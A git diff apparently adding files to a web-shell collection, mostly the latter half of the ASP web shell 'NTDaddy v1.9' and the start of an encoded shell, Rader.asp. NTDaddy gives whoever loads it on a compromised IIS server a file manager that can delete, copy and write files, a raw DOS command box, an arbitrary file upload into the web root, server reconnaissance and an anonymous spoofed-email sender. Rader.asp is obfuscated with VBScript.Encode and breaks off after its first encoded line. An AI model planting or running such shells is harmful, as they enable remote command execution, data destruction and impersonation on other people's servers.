+Set f = fs.Getfolder(selFolder)
+f.attributes=int(TempAtt)
+response.write("Folder: " & selFolder & " attributes have been changed.")
+end select
+Select Case TextCmd
+case "SaveAs"
+TextWrite = Request.form("txtFile")
+TextCreateFormat = Request.form("optUnicode")
+if textcreateformat = "TRUE" then
+tempmsg="Unicode"
+else
+tempmsg="ASCII"
+end if
+Set TextFile = fs.CreateTextFile(FilePath, True,TextCreateFormat)
+TextFile.Write TextWrite
+TextFile.Close
+response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.")
+end select
+%>
+<%
+Public CurrentPath
+Function ShowDriveLetters()
+on error resume next
+Dim fs, d, dc, t
+dim isReadyColor,TempSize,ShowDriveInfo
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set dc = fs.Drives
+ShowDriveInfo=Request.Form("chkShowDriveInfo")
+response.write("<form name=lstDrives action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+if showdriveinfo="TRUE" then
+response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info  </td></tr>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>File System</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Serial #</u><b></td>")
+else
+response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>")
+end if
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Type</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Drive</u><b></td>")
+if showdriveinfo="TRUE" then
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Volume Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Share Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Free Space</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Total Size</u><b></td>")
+end if
+response.write("</tr>")
+For Each d in dc
+Select Case d.DriveType
+Case 0: t = "Unknown"
+Case 1: t = "Removable"
+Case 2: t = "Fixed"
+Case 3: t = "Network"
+Case 4: t = "CD-ROM"
+Case 5: t = "RAM Disk"
+End Select
+if showdriveinfo="TRUE" then
+if d.isReady then
+response.write("<TR bgcolor=#000000>")
+else
+response.write("<TR bgcolor=#191970>")
+end if
+if d.filesystem = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.filesystem & "</td>")
+end if
+if d.SerialNumber = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.SerialNumber & "</td>")
+end if
+else
+response.write("<TR>")
+end if
+response.write("<td align=center>" & t & "</td>")
+response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>")
+if showdriveinfo="TRUE" then
+if d.volumename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.volumename & "</td>")
+end if
+if d.sharename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.sharename & "</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+freespace = (d.AvailableSpace / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(freespace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+totalspace = (d.TotalSize / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(totalspace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+end if
+Next
+response.write("</tr>")
+response.write("</tr></table>")
+response.write("</form>")
+End Function
+Function ShowFolderNames()
+on error resume next
+Dim fs, f, f1, s, sf ,FP
+dim ShowFolderInfo,FolderAttributes 
+ShowFolderInfo=request.form("chkShowFolderInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set sf = f.SubFolders
+response.write("<form name=lstFolders action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>")
+response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) &  fp & chr(34) & ">")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder><br><input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>")
+if showfolderinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Folder</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in sf
+if showfolderinfo="TRUE" then
+response.write("<tr>")
+response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+folderattributes="...."
+select case f1.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FolderAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>")
+else
+response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>")
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+Function ShowFileNames()
+on error resume next
+Dim fs, f, f1, fc, FP
+dim ShowFileInfo,FileAttributes,ShowPrefix
+ShowPrefix=request.form("txtShowPrefix")
+ShowFileInfo=Request.form("chkShowFileInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set fc = f.Files
+response.write("<form name=lstFiles action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info &<br>Show Only:  <input type=text name=txtShowPrefix value= ></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>")
+if showfileinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>File</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in fc
+if showfileinfo="TRUE" then
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr>")
+response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+select case f1.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FileAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>")
+end if
+else
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>")
+end if
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+%>
+<STYLE>
+BODY
+{scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc;
+scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc;
+scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000;
+scrollbar-arrow-color: #000000}
+</STYLE>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<center>
+<font size="18" color="#ffffff">NTDaddy | fux0r inc.</font>
+<hr color="#ffffff">
+<table border=1 width="100%" color="#fffff">
+<tr>
+<td align=center width=100% bgcolor=#ffffff><font color=#000000><a name=lblCurrentPath value=
+<% 
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+end if
+response.write(chr(34) & IP & chr(34) & ">" & FP)
+%>
+</a></td>
+</tr>
+</table>
+<table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%>
+<tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td>
+<td align=center></td></tr>
+<tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td>
+<td align=right><% =ShowFileNames() %></td>
+</tr>
+</table>
+<br><hr color="#ffffff"><br>
+<table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff">
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Remote Info.</b></font>
+</td>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Local Info.</b></font>
+</td>
+</tr>
+<tr>
+<td align=left>
+<div align=left><font size="3">
+<b>User</b>: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> <br>
+<b>ID</b>: <%=request.servervariables("SERVER_NAME")%> <br>
+<b>IP</b>: <%=request.servervariables("LOCAL_ADDR")%> <br>
+<b>HTTPD</b>: <%=request.servervariables("SERVER_SOFTWARE")%> <b>Port</b>: <%=request.servervariables("SERVER_PORT")%> <br>
+<b>Webroot</b>: <%=request.servervariables("APPL_PHYSICAL_PATH")%> <br>
+<b>LogRoot</b>: <%=request.servervariables("APPL_MD_PATH")%> <br>
+<b>Date</b>: <% =date() %> <br>
+<b>Time</b>: <%=time() %> <br>
+<b>HTTPs</b>: <%=request.servervariables("HTTPS")%>
+<br></font></div>
+</td>
+<td align="left" valign="top">
+<b>Local Addr (What they see.)</b>: <%=request.servervariables("REMOTE_ADDR")%> <br>
+<b>Forwarded from</b> : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> <br>
+<b>Via</b>: <%=request.servervariables("HTTP_VIA")%> <br>
+<b>User Agent</b>: <%=request.servervariables("HTTP_USER_AGENT")%> <br>
+<b>Wookie</b>: <%=request.servervariables("HTTP_WOOKIE")%> <br>
+<b>Cache Control</b>: <%=request.servervariables("HTTP_CACHE_CONTROL")%> <br>
+<b>Interface</b>: <%=request.servervariables("GATEWAY_INTERFACE")%> <br>
+<b>Protocol</b>: <%=request.servervariables("SERVER_PROTOCOL")%> <br>
+<b>Method</b>: <%=request.servervariables("REQUEST_METHOD")%>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• File Upload Utility</b></font></td>
+</tr>
+<tr>
+<td align="left">
+<form method=post ENCTYPE="multipart/form-data">
+<b>File</b> : <input type="file" size="35" name="File1"><br>
+<input type="submit" Name="Action" value="Upload the file">
+</form></td>
+</tr>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• RAW D.O.S. COMMAND INTERFACE</b></font></td>
+</tr>
+<tr valign="top">
+<td align="left">
+<form action="<%= Request.ServerVariables("URL") %>" method="POST">
+<p><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </p>
+</form>
+<pre>
+<%
+If (IsObject(oFile)) Then
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If%>
+</pre>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<form action=ntdaddy.asp method=post>
+<form action=ntdaddy.asp method=post>
+<table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400">
+<tr>
+<td bgcolor="#F8F8FF" colspan="2"><font color="#000000" align="left"><b>• Anonymous Email Utility</b></font></td>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>From:</b></font> </td>
+<td><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>To:</b></font> </td>
+<td><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>Subject:</b></font> </td>
+<td><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td valign="top" bgcolor="#F8F8FF"><font color="#000000"><b>Body:</b></font> </td>
+<td><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></td>
+</tr>
+<tr>
+<td align="right" bgcolor="#F8F8FF" colspan="2">
+<input type="submit" value="Send Mail">
+<input type="hidden" name="flag" value="1"></td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<font size="#ffffff"><center>•[ <b>NTDaddy v1.9</b> ][ by obzerve ][ for the brothers of <b>fux0r inc.</b> 2k+1 ]•</b></center></font>
+</body>
+</html>
+<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
+Const IncludeType = 2 
+Dim UploadSizeLimit
+Function GetUpload()
+Dim Result
+Set Result = Nothing
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Dim CT, PosB, Boundary, Length, PosE
+CT = Request.ServerVariables("HTTP_Content_Type") 
+If LCase(Left(CT, 19)) = "multipart/form-data" Then 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 Then Boundary = Mid(CT, PosB + 9) 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 then 
+PosB = InStr(Boundary, ",")
+If PosB > 0 Then Boundary = Left(Boundary, PosB - 1)
+end if
+Length = CLng(Request.ServerVariables("HTTP_Content_Length")) 
+If "" & UploadSizeLimit <> "" Then
+UploadSizeLimit = CLng(UploadSizeLimit)
+If Length > UploadSizeLimit Then
+Request.BinaryRead (Length)
+Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B"
+Exit Function
+End If
+End If
+If Length > 0 And Boundary <> "" Then 
+Boundary = "--" & Boundary
+Dim Head, Binary
+Binary = Request.BinaryRead(Length) 
+Set Result = SeparateFields(Binary, Boundary)
+Binary = Empty 
+Else
+Err.Raise 10, "GetUpload", "Zero length request ."
+End If
+Else
+Err.Raise 11, "GetUpload", "No file sent."
+End If
+Else
+Err.Raise 1, "GetUpload", "Bad request method."
+End If
+Set GetUpload = Result
+End Function
+Function SeparateFields(Binary, Boundary)
+Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary
+Dim Fields
+Boundary = StringToBinary(Boundary)
+PosOpenBoundary = InStrB(Binary, Boundary)
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0)
+Set Fields = CreateObject("Scripting.Dictionary")
+Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary)
+Dim HeaderContent, FieldContent, bFieldContent
+Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Dim Field, TwoCharsAfterEndBoundary
+PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf))
+HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2)
+bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2)
+GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Set Field = CreateUploadField() 
+Set FieldContent = CreateBinaryData()
+FieldContent.ByteArray = bFieldContent
+FieldContent.Length = LenB(bFieldContent)
+Field.Name = FormFieldName
+Field.ContentDisposition = Content_Disposition
+Field.FilePath = SourceFileName
+Field.FileName = GetFileName(SourceFileName)
+Field.ContentType = Content_Type
+Field.Length = FieldContent.Length
+Set Field.Value = FieldContent
+Fields.Add FormFieldName, Field
+TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2))
+isLastBoundary = TwoCharsAfterEndBoundary = "--"
+If Not isLastBoundary Then 
+PosOpenBoundary = PosCloseBoundary
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary)
+End If
+Loop
+Set SeparateFields = Fields
+End Function
+Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type)
+Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";"))
+Name = (SeparateField(Head, "name=", ";")) 
+If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2)
+FileName = (SeparateField(Head, "filename=", ";")) 
+If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2)
+Content_Type = LTrim(SeparateField(Head, "content-type:", ";"))
+End Function
+Function SeparateField(From, ByVal sStart, ByVal sEnd)
+Dim PosB, PosE, sFrom
+sFrom = LCase(From)
+PosB = InStr(sFrom, sStart)
+If PosB > 0 Then
+PosB = PosB + Len(sStart)
+PosE = InStr(PosB, sFrom, sEnd)
+If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf)
+If PosE = 0 Then PosE = Len(sFrom) + 1
+SeparateField = Mid(From, PosB, PosE - PosB)
+Else
+SeparateField = Empty
+End If
+End Function
+Function GetFileName(FullPath)
+Dim Pos, PosF
+PosF = 0
+For Pos = Len(FullPath) To 1 Step -1
+Select Case Mid(FullPath, Pos, 1)
+Case "/", "\": PosF = Pos + 1: Pos = 0
+End Select
+Next
+If PosF = 0 Then PosF = 1
+GetFileName = Mid(FullPath, PosF)
+End Function
+Function BinaryToString(Binary)
+dim cl1, cl2, cl3, pl1, pl2, pl3
+Dim L
+cl1 = 1
+cl2 = 1
+cl3 = 1
+L = LenB(Binary)
+Do While cl1<=L
+pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
+cl1 = cl1 + 1
+cl3 = cl3 + 1
+if cl3>300 then
+pl2 = pl2 & pl3
+pl3 = ""
+cl3 = 1
+cl2 = cl2 + 1
+if cl2>200 then
+pl1 = pl1 & pl2
+pl2 = ""
+cl2 = 1
+End If
+End If
+Loop
+BinaryToString = pl1 & pl2 & pl3
+End Function
+Function BinaryToStringold(Binary)
+Dim I, S
+For I = 1 To LenB(Binary)
+S = S & Chr(AscB(MidB(Binary, I, 1)))
+Next
+BinaryToString = S
+End Function
+Function StringToBinary(String)
+Dim I, B
+For I=1 to len(String)
+B = B & ChrB(Asc(Mid(String,I,1)))
+Next
+StringToBinary = B
+End Function
+Function vbsSaveAs(FileName, ByteArray)
+Dim FS, TextStream
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set TextStream = FS.CreateTextFile(FileName)
+TextStream.Write BinaryToString(ByteArray) 
+TextStream.Close
+End Function
+</SCRIPT>
+<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
+function CreateUploadField(){ return new uf_Init() }
+function uf_Init(){
+this.Name = null
+this.ContentDisposition = null
+this.FileName = null
+this.FilePath = null
+this.ContentType = null
+this.Value = null
+this.Length = null
+}
+function CreateBinaryData(){ return new bin_Init() }
+function bin_Init(){
+this.ByteArray = null
+this.Length = null
+this.String = jsBinaryToString
+this.SaveAs = jsSaveAs
+}
+function jsBinaryToString(){
+return BinaryToString(this.ByteArray)
+}
+function jsSaveAs(FileName){
+return vbsSaveAs(FileName, this.ByteArray)
+}
+</SCRIPT>
+<%
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Set Fields = GetUpload()
+FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName
+Fields("File1").Value.SaveAs FilePath
+End If
+%>
+<%
+Else
+Dim anonFrom,anonTo,anonSubj,anonBody
+anonFrom = request.form("From")
+anonTo = request.form("To")
+anonSubj = request.form("Subject")
+anonBody = request.form("Body")
+Set objMail = CreateObject("CDONTS.NewMail")
+objMail.From=anonFrom
+objMail.To=anonTo
+objMail.Subject=anonSubj
+objMail.Body=anonBody
+intReturn=objMail.Send()
+%>
+<html>
+<head><title>|[NTDaddy v1.9 | anon email]</title></head>
+<h1>Message sent successfully!</h1><br><br><br>
+<table border=0 cellpadding="0" cellspacing="3">
+<tr>
+<td>
+<input type='button' value='Back' onclick=history.back()> </td>
+<td>
+<h2>[NTDaddy v1.9 - obzerve | fux0r inc.]</h2> </td>
+</tr>
+</table>
+</html>
+<%
+End if
+%>
+
+
+
diff --git a/xakep-shells/ASP/Rader.asp.txt b/xakep-shells/ASP/Rader.asp.txt
new file mode 100644
index 0000000..6cec6a0
--- /dev/null
+++ b/xakep-shells/ASP/Rader.asp.txt
@@ -0,0 +1,116 @@
+<%@ LANGUAGE = VBScript.Encode %>
+
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<!--
+         
+            
+            
+             HACKING 
+              Mehdi & HolyDemon
+                 www.infilak.tr.cx & www.infilaktim.tk
+           
+-->
+<%#@~^FAAAAA==G	PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> 
